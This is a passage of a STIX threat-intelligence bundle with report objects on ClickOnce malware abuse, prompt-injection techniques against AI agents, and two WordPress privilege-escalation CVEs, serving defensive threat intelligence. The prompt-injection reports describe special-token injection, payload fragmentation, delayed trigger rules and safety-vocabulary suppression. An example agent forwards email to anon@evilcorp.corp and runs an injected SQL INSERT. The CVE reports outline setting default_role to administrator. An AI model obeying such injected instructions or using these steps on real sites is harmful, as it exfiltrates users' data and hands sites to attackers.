      "description": "## Overview\n\nSince at least June 2026, threat actors have intensified their abuse of Microsoft's ClickOnce technology to deliver and persist malware on target systems, as highlighted by recent CrowdStrike observations. This technique exploits ClickOnce's minimal user interaction requirement for deployment, which often bypasses traditional scrutiny applied to `.exe` files and common email filtering systems. Attackers leverage the fact that ClickOnce applications can be installed without administrator privileges, targeting standard user accounts that comprise most enterprise endpoints. A key new abuse involves the stealthy updating mechanism inherent in ClickOnce, allowing attackers to transform initially benign applications into malicious ones post-installation or to modify C2 infrastructure, deliver new payloads, and facilitate lateral movement. Execution occurs within legitimate Microsoft process trees like `rundll32.exe` and `dfsvc.exe`, further aiding defense evasion. This method creates a powerful, low-barrier-to-entry attack vector that poses a significant challenge for security teams due to its inherent legitimacy and update capabilities.\n\n## Attack Chain\n\n1.  **Initial Access**: Threat actor crafts a malicious ClickOnce application and hosts it on a controlled server, then delivers a link (e.g., via phishing email or compromised website) to the target.\n2.  **User Execution**: The victim clicks the provided link, initiating the ClickOnce deployment process with minimal user prompts, often bypassing traditional user awareness of software installation.\n3.  **Application Deployment**: The ClickOnce application is deployed onto the user's system, leveraging legitimate Microsoft processes such as `dfsvc.exe` (ClickOnce Deployment Services) for execution.\n4.  **Initial Payload Execution**: The deployed ClickOnce application executes its embedded malicious payload, typically within the process context of `rundll32.exe`, without requiring elevated administrative privileges.\n5.  **Persistence Establishment**: The threat actor establishes persistence by dropping an `.appref-ms` shortcut file into the user's `Start Menu\\Programs\\Startup\\` folder, ensuring the malicious application restarts with the system.\n6.  **Remote Access \u0026 Command and Control (C2)**: The ClickOnce application establishes an initial C2 channel, enabling remote access and data exfiltration.\n7.  **Malware Update \u0026 Lateral Movement**: The attacker leverages the built-in ClickOnce update mechanism to push new malicious components or modify existing ones (e.g., updating C2 addresses, delivering additional malware, or enabling lateral movement) without further user interaction.\n8.  **Impact**: Maintenance of long-term remote access, continuous delivery of updated malware, potential for data exfiltration, and significant compromise of the target system and network.\n\n## Impact\n\nIf successful, this ClickOnce abuse leads to the stealthy execution and persistence of malware on targeted systems, allowing threat actors to maintain remote access and continually update their malicious capabilities. The attacker can deliver new payloads, alter command and control infrastructure, and facilitate lateral movement within the compromised network. This method enables the circumvention of security controls, as the initial deployment and subsequent updates occur within legitimate Microsoft processes and leverage trusted system functionalities. While specific victim numbers are not provided, the general nature of this technique suggests a broad applicability across various sectors, impacting any organization where ClickOnce applications are implicitly trusted or not adequately monitored. The primary consequence is sustained unauthorized access and control over enterprise endpoints.\n\n## Recommendation\n\n*   Deploy the Sigma rules in this brief to your SIEM and tune for your environment to detect suspicious ClickOnce-related activities.\n*   Enable Sysmon process-creation logging to capture parent-child process relationships for rules targeting `dfsvc.exe` and `rundll32.exe`.\n*   Enable Sysmon file-event logging (Event ID 11) to detect the creation of `.appref-ms` files in persistence locations.\n*   Educate users on the risks associated with unexpected software installation prompts, especially those leveraging technologies like ClickOnce, and to report suspicious links or files.\n",
      "published": "2026-07-08T06:08:11Z",
      "labels": [
        "clickonce",
        "malware",
        "persistence",
        "defense-evasion",
        "windows",
        "supply-chain-abuse"
      ],
      "object_refs": [
        "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
        "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f",
        "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
        "attack-pattern--795e0dc0-384c-5fff-a1a3-4ec9857c249d",
        "attack-pattern--0856bd82-6dcb-584e-bbac-9f484aa79d34",
        "attack-pattern--e26451c2-381a-5681-88b3-9fe88c4d5e5a",
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/new-abuse-of-the-clickonce-technology-part-two/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--1b464a96-bbbd-58c7-b619-923f9c256126",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "email: anon@evilcorp.corp",
      "pattern": "[email-addr:value = 'anon@evilcorp.corp']",
      "pattern_type": "stix",
      "valid_from": "2026-07-08T06:05:47Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--32bfb8e9-5f11-546c-bb0e-173a485f43f3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--339c46ec-791d-5884-92d9-1127a348eb8c",
      "target_ref": "indicator--1b464a96-bbbd-58c7-b619-923f9c256126"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Phishing",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1566",
          "url": "https://attack.mitre.org/techniques/T1566"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fa45889f-b1ba-534e-943a-cf146feac942",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--339c46ec-791d-5884-92d9-1127a348eb8c",
      "target_ref": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Obfuscated Files or Information",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1027",
          "url": "https://attack.mitre.org/techniques/T1027"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cd2528b9-0270-5e0b-a1ea-8fa538235c1f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--339c46ec-791d-5884-92d9-1127a348eb8c",
      "target_ref": "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Masquerading",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1036",
          "url": "https://attack.mitre.org/techniques/T1036"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3f439c95-b62e-5e81-8638-78e2d1ee090f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--339c46ec-791d-5884-92d9-1127a348eb8c",
      "target_ref": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cff00f7a-2341-5e36-b87e-ffe48803bdd1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--339c46ec-791d-5884-92d9-1127a348eb8c",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--465a38e0-65ed-5b24-b51b-228c2afdc195",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over Web Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1567",
          "url": "https://attack.mitre.org/techniques/T1567"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--802b746e-b6ed-541c-b752-42c26e4a4481",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--339c46ec-791d-5884-92d9-1127a348eb8c",
      "target_ref": "attack-pattern--465a38e0-65ed-5b24-b51b-228c2afdc195"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--339c46ec-791d-5884-92d9-1127a348eb8c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CrowdStrike Uncovers New Prompt Injection Techniques",
      "description": "## Overview\n\nCrowdStrike's AI security research team, in July 2026, has expanded its taxonomy of prompt injection techniques by 18 new additions, now covering over 200 distinct methods adversaries are using to manipulate AI systems. These evolving techniques reflect how prompt injection attacks are manifesting in real-world AI systems, moving beyond simple jailbreaks to more sophisticated approaches. The core delivery mechanism involves indirect prompt injection, where malicious instructions are hidden within data consumed by AI agents, or through \"Unwitting User Delivery\" (IM0005) via social engineering. The threat matters for defenders because modern AI agents can perform sensitive actions such as crawling webpages, accessing file stores, and writing shell commands. Specific new techniques include Trigger-Activated Rule Addition (PT0201) for delayed activation, Cognitive Token Suppression (PT0197) to bypass safety mechanisms, Algorithmic Payload Decomposition (PT0200) for filter evasion, and Special Token Injection (PT0198) to confuse AI system boundaries, all aiming to hijack agent capabilities and cause further damage.\n\n## Attack Chain\n\nThis brief describes new techniques for prompt injection and does not detail a specific end-to-end attack campaign from initial access to impact. The following outlines how these techniques are leveraged once an attacker introduces a malicious prompt or data to an AI system.\n\n1.  **Initial Access (via Social Engineering):** An adversary employs social engineering or deceptive tactics to trick an authorized user into submitting a crafted prompt, effectively turning the user into an \"Unwitting User Delivery\" (IM0005) vector. This can involve copying/pasting hidden commands or using compromised browser extensions.\n2.  **Prompt Manipulation (Algorithmic Payload Decomposition):** The attacker fragments a malicious instruction into multiple benign-looking steps, variables, or characters. This \"Algorithmic Payload Decomposition\" (PT0200) technique evades immediate detection by filters.\n3.  **Bypass Defenses (Special Token Injection):** The fragmented payload or a new prompt includes \"Special Token Injection\" (PT0198), mimicking internal structural cues (e.g., `\u003ctool_call\u003e`) used by the AI system to differentiate system commands from user input, causing boundary confusion and elevating untrusted content.\n4.  **Evasion (Cognitive Token Suppression):** The malicious prompt attempts \"Cognitive Token Suppression\" (PT0197) by instructing the AI model to avoid using specific safety-related terms or refusal vocabulary, hindering its ability to generate secure responses or block the attack.\n5.  **Delayed Execution (Trigger-Activated Rule Addition):** The attacker embeds a \"Trigger-Activated Rule Addition\" (PT0201) instruction into the AI's context. This instruction remains dormant until a specific trigger phrase, event, or condition occurs, at which point the AI agent begins to follow the new, malicious rule.\n6.  **Action on Objectives (Execution):** The compromised AI agent, following the injected rules, executes unintended or malicious commands, such as an `execute_sql_query` to access sensitive data, or shell commands to interact with underlying systems.\n7.  **Impact (Data Exfiltration):** The AI agent, now under adversary control, proceeds to exfiltrate data, for example, by duplicating and forwarding sensitive emails to an attacker-controlled address like `anon@evilcorp.corp`, or by accessing and leaking internal files.\n\n## Impact\n\nThe observed impact of successful prompt injection ranges from subtle manipulation of AI behavior to significant security breaches. Adversaries can hijack agent capabilities, leading to unintended actions like executing arbitrary shell commands, performing SQL injection-like queries, or accessing and exfiltrating sensitive data. This can bypass existing security rules, steer agents into unsafe actions, and result in data loss or system compromise. While specific victim counts are not provided, the techniques target general AI systems and agents, affecting any organization deploying such technologies, especially those relying on AI for critical operations or data handling.\n\n## Recommendation\n\n*   Implement robust AI threat modeling that accounts for all possible origins of model context, including prompts, files, RAG pipelines, agent memory, APIs, tool outputs, browser content, emails, and SaaS data, to understand potential injection points.\n*   Conduct targeted AI red teaming exercises that go beyond simple \"ignore previous instructions\" and incorporate boundary mimicry, indirect injection, and delayed activation scenarios, as described by techniques like PT0198 and PT0201.\n*   Monitor for and block outbound network connections from AI systems or agents to suspicious domains, such as `evilcorp.corp`, which was identified as an exfiltration target in an example for the IM0005 technique.\n*   Educate users on the risks of \"Unwitting User Delivery\" (IM0005) by training them to recognize and avoid deceptive tactics that could lead to submitting malicious prompts.\n*   Deploy specialized AI security solutions capable of analyzing and detecting fragmented (PT0200), suppressed (PT0197), or specially tokenized (PT0198) instructions within prompts before they are processed by AI models.\n",
      "published": "2026-07-08T06:05:47Z",
      "labels": [
        "prompt-injection",
        "ai-security",
        "llm",
        "agentic-ai",
        "cloud",
        "threat-research"
      ],
      "object_refs": [
        "indicator--1b464a96-bbbd-58c7-b619-923f9c256126",
        "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
        "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2",
        "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--465a38e0-65ed-5b24-b51b-228c2afdc195"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/crowdstrike-uncovers-new-prompt-injection-techniques/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--510091b3-61b0-5db0-9f21-a75ee321a68e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "email: anon@evilcorp.corp",
      "pattern": "[email-addr:value = 'anon@evilcorp.corp']",
      "pattern_type": "stix",
      "valid_from": "2026-07-08T05:53:11Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--aa7003d5-d0ec-5b84-bdea-f8c3a6d8db59",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9601442d-e33d-5ad4-b2ea-90df94a06591",
      "target_ref": "indicator--510091b3-61b0-5db0-9f21-a75ee321a68e"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Obfuscated Files or Information",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1027",
          "url": "https://attack.mitre.org/techniques/T1027"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--38c751b2-9933-55e2-8dc4-0fcae85c81b7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9601442d-e33d-5ad4-b2ea-90df94a06591",
      "target_ref": "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--de03281a-6ef2-5f8c-a87b-f7ef5f4554ca",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9601442d-e33d-5ad4-b2ea-90df94a06591",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Phishing",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1566",
          "url": "https://attack.mitre.org/techniques/T1566"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7898b84b-d98c-545d-8373-898e1c5c6df4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9601442d-e33d-5ad4-b2ea-90df94a06591",
      "target_ref": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--9601442d-e33d-5ad4-b2ea-90df94a06591",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CrowdStrike Identifies New AI Prompt Injection Techniques",
      "description": "## Overview\n\nCrowdStrike's AI security research team has identified 18 novel prompt injection techniques, significantly expanding their existing taxonomy to over 200 distinct methods for manipulating AI systems. Published on July 7, 2026, these new techniques highlight the evolving threat landscape as organizations shift from static chatbots to dynamic AI agents capable of advanced operations like crawling webpages, accessing file stores, and executing shell commands. The core innovation for adversaries lies in manipulating the language, context, and data trusted by these systems, often through indirect means where malicious intent is hidden within consumed data or user inputs. Key examples include \"Trigger-Activated Rule Addition\" (PT0201) for delayed command execution, \"Cognitive Token Suppression\" (PT0197) to bypass safety, \"Algorithmic Payload Decomposition\" (PT0200) for filter evasion, \"Special Token Injection\" (PT0198) for boundary confusion, and \"Unwitting User Delivery\" (IM0005) which turns legitimate users into unwitting vectors. These advancements necessitate a re-evaluation of AI threat modeling and red teaming strategies to counter increasingly sophisticated AI-driven attacks.\n\n## Attack Chain\n\n1.  **Craft Malicious Instruction**: An attacker develops a prompt incorporating a malicious instruction, leveraging techniques such as Trigger-Activated Rule Addition (PT0201) to embed commands that activate under specific future conditions, or Cognitive Token Suppression (PT0197) to disable AI safety responses.\n2.  **Obfuscate or Fragment Payload**: The malicious instruction is hidden or fragmented to evade detection, using methods like Algorithmic Payload Decomposition (PT0200) to break the command into benign-looking pieces, or Special Token Injection (PT0198) to mimic internal AI system markers and cause boundary confusion.\n3.  **Deliver to AI System**: The crafted and obfuscated prompt is delivered to the AI system, either directly through an API or interface, or indirectly via \"Unwitting User Delivery\" (IM0005) where a user is tricked into inputting the malicious prompt, possibly through social engineering (e.g., a manipulated TikTok video).\n4.  **AI System Ingestion**: The AI agent ingests the prompt, including the fragmented or specially tokenized components, as part of its operational context or input stream.\n5.  **Instruction Synthesis/Misinterpretation**: The AI system, due to the attacker's careful crafting, reassembles the fragmented payload or misinterprets its internal boundaries, treating the attacker's content as a high-priority system directive rather than untrusted user input.\n6.  **Execute Malicious Directive**: The compromised AI agent executes the hidden instruction, such as automatically forwarding sensitive emails to `anon@evilcorp.corp` or executing unauthorized SQL queries (e.g., `SELECT name, salary FROM employees WHERE department = 'HAXXOR'; INSERT INTO employees (id, name, department, salary) VALUES (666, 'Sentry', 'Rocks', 66666);`).\n7.  **Impact on System/Data**: The execution of the malicious directive leads to unauthorized actions, such as data exfiltration, bypass of intended safety features, or broader compromise of systems connected to the AI agent.\n\n## Impact\n\nThe observed impact of these prompt injection techniques includes the subversion of AI agent capabilities, leading to unauthorized data access, modification, or exfiltration. Adversaries can trick AI systems into performing actions they were not designed for, such as sending sensitive information to attacker-controlled addresses (e.g., `anon@evilcorp.corp`) or executing arbitrary database commands. While no specific victim counts are provided, the broad applicability to AI agents and chatbots across various sectors (especially those integrating AI for data access or automation) suggests widespread potential for compromise, resulting in data breaches, operational disruption, and reputational damage. These techniques directly challenge the security and reliability of AI deployments.\n\n## Recommendation\n\n*   Prioritize monitoring and logging of all prompt inputs and AI agent outputs to detect anomalous behavior.\n*   Implement robust input validation and sanitization for all data fed into AI models and agents, specifically looking for patterns described in techniques like Algorithmic Payload Decomposition (PT0200) and Special Token Injection (PT0198).\n*   Enhance AI threat modeling to include all potential origins of model context, such as prompts, files, RAG pipelines, agent memory, APIs, tool outputs, browser content, emails, and SaaS data, as highlighted in the brief.\n*   Conduct targeted AI red teaming exercises that go beyond simple \"ignore previous instructions\" and incorporate advanced methods like boundary mimicry, indirect injection, and delayed activation (e.g., Trigger-Activated Rule Addition PT0201).\n*   Educate users on the risks of \"Unwitting User Delivery\" (IM0005) and social engineering tactics that entice them to input malicious prompts.\n*   Develop anomaly detection rules based on the examples provided in the brief, specifically looking for email addresses like `anon@evilcorp.corp` in outgoing communications from AI agents, or unexpected SQL queries.\n",
      "published": "2026-07-08T05:53:11Z",
      "labels": [
        "prompt-injection",
        "ai-security",
        "defense-evasion",
        "initial-access",
        "data-exfiltration"
      ],
      "object_refs": [
        "indicator--510091b3-61b0-5db0-9f21-a75ee321a68e",
        "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
        "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/crowdstrike-uncovers-new-prompt-injection-techniques/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a0e58a4a-644d-5214-bc36-88a8a83ca5b3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2d7ca0af-aeae-56bd-8fcc-f4e2807c430b",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--2d7ca0af-aeae-56bd-8fcc-f4e2807c430b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-9842: WordPress Backstage Customizer Demo Plugin Privilege Escalation",
      "description": "## Overview\n\nCVE-2026-9842 discloses a critical privilege escalation vulnerability affecting all versions up to, and including, 1.4.2 of The Backstage - Customizer Demo Access plugin for WordPress. The flaw stems from the plugin's misconfiguration, which grants the `manage_options` capability to the `backstage_customizer_user` demo role. This capability is overly permissive for a demo user and enables an unauthenticated attacker to bypass the intended scope of the Customizer feature. By leveraging this misassignment, attackers can manipulate crucial WordPress settings, such as modifying the `default_role` to 'administrator'. This allows them to register a new user with administrative privileges, thereby achieving full control over the compromised WordPress site. The vulnerability highlights the dangers of over-privileging non-administrative roles, especially those accessible without full authentication.\n\n## Attack Chain\n\n1. An unauthenticated attacker identifies a WordPress instance running The Backstage - Customizer Demo Access plugin version 1.4.2 or earlier.\n2. The attacker crafts a specially designed HTTP POST request targeting a WordPress administrative endpoint, such as `/wp-admin/options.php` or `/wp-admin/admin-post.php`.\n3. This request leverages the `manage_options` capability inadvertently assigned to the `backstage_customizer_user` demo role by the vulnerable plugin, even without proper authentication or a session for that role.\n4. The request successfully manipulates WordPress to update a sensitive configuration option, specifically setting `default_role` to a higher-privileged role like 'administrator'.\n5. The attacker then proceeds to register a new user account on the WordPress site.\n6. Due to the manipulated `default_role` setting, the newly registered user account is automatically provisioned with administrative privileges.\n7. The attacker logs in with the newly created administrative account, gaining full control over the WordPress instance, including content modification, plugin management, and theme editing.\n\n## Impact\n\nA successful exploitation of CVE-2026-9842 results in full administrative control over the targeted WordPress website. Attackers can deface the site, inject malicious code, exfiltrate sensitive data (if stored on the site), redirect visitors to malicious domains, or use the compromised site as a platform for further attacks (e.g., hosting phishing pages or malware). For unauthenticated attackers, gaining administrative access represents a complete compromise of the web application, leading to significant reputational damage, data breaches, and potential regulatory fines for affected organizations. The widespread use of WordPress plugins means a significant number of websites could be at risk if they are running the vulnerable version of this specific plugin.\n\n## Recommendation\n\n*   Immediately update The Backstage - Customizer Demo Access plugin to a patched version beyond 1.4.2 to address CVE-2026-9842.\n*   Deploy the Sigma rule \"Detects CVE-2026-9842 Exploitation — WordPress Default Role Modification\" to your SIEM and tune for your environment to identify attempts to exploit this vulnerability.\n*   Review webserver logs for `/wp-admin/options.php` or `/wp-admin/admin-post.php` requests containing `default_role=` from unexpected sources or unauthenticated sessions.\n",
      "published": "2026-07-08T05:23:07Z",
      "labels": [
        "privilege-escalation",
        "wordpress",
        "web-vulnerability",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-9842"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Account Manipulation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1098",
          "url": "https://attack.mitre.org/techniques/T1098"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f001f652-77e5-5495-b8ba-da10c357140d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--19492b02-033f-58b2-bf48-de21fa6cf293",
      "target_ref": "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--19492b02-033f-58b2-bf48-de21fa6cf293",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14482 - WordPress 多说社会化评论框 Plugin Privilege Escalation",
      "description": "## Overview\n\nThe 多说社会化评论框 (Duoshuo Social Comments Box) plugin for WordPress contains a severe privilege escalation vulnerability, tracked as CVE-2026-14482, affecting all versions up to and including 1.2. This flaw stems from an API endpoint lacking essential capability and nonce checks, combined with a signature mechanism (HMAC-SHA1) that is trivially forgeable due to its reliance on an always-empty WordPress option as a key. This critical design flaw permits unauthenticated attackers to directly inject arbitrary `option` and `value` parameters into WordPress's `update_option` function. By manipulating settings such as `default_role` to `administrator` and enabling open registration, attackers can subsequently register a new user account with full administrative rights, completely compromising the affected WordPress site. This vulnerability poses a significant risk to the integrity and security of websites utilizing this plugin.\n\n## Attack Chain\n\n1.  An unauthenticated attacker identifies a WordPress site running the vulnerable 多说社会化评论框 plugin (version \u003c= 1.2).\n2.  The attacker crafts an HTTP POST request targeting the web-accessible API endpoint within the plugin, which is susceptible to option manipulation.\n3.  The attacker includes parameters to forge a valid-looking HMAC-SHA1 signature, exploiting the empty WordPress option used as the signing key.\n4.  Within the POST request, the attacker specifies `option` and `value` parameters, such as setting `default_role` to `administrator` and enabling `users_can_register`.\n5.  The vulnerable plugin endpoint processes the request, passing the attacker-controlled `option` and `value` directly to WordPress's `update_option` function without proper validation.\n6.  WordPress updates critical settings, allowing new users to register and automatically assigning them administrator privileges.\n7.  The attacker registers a new account on the compromised WordPress site.\n8.  The newly registered account is granted administrator privileges, providing the attacker with full control over the website.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14482 grants unauthenticated attackers complete administrative control over the targeted WordPress website. This can lead to severe consequences including, but not limited to, full site defacement, injection of malicious code (e.g., for drive-by downloads or phishing), unauthorized data access or modification, and potentially leveraging the compromised website as a pivot point for further attacks on the hosting environment or other networked systems. The integrity and availability of the website are completely compromised, with potential reputational damage and significant recovery costs for affected organizations. There are no concrete victim counts specified, but any WordPress site running the vulnerable plugin is at risk.\n\n## Recommendation\n\n*   Immediately remove or update the 多说社会化评论框 plugin to a patched version if available, or disable it if no patch exists for CVE-2026-14482.\n*   Deploy the Sigma rule provided in this brief to your SIEM to detect exploitation attempts against the web server.\n*   Review web server access logs for requests targeting plugin-specific API endpoints containing suspicious `option` and `value` parameters as detailed in the Attack Chain.\n*   Inspect WordPress user accounts for any newly created administrator accounts that were not legitimately provisioned.\n",
      "published": "2026-07-08T05:22:17Z",
      "labels": [
        "privilege-escalation",
        "wordpress",
        "plugin",
        "web",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14482"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7ccfcd8f-4de9-59c0-9a00-ce01ae779ce3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4ea6f0cc-35f2-5a9f-b88b-d355311cdff6",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
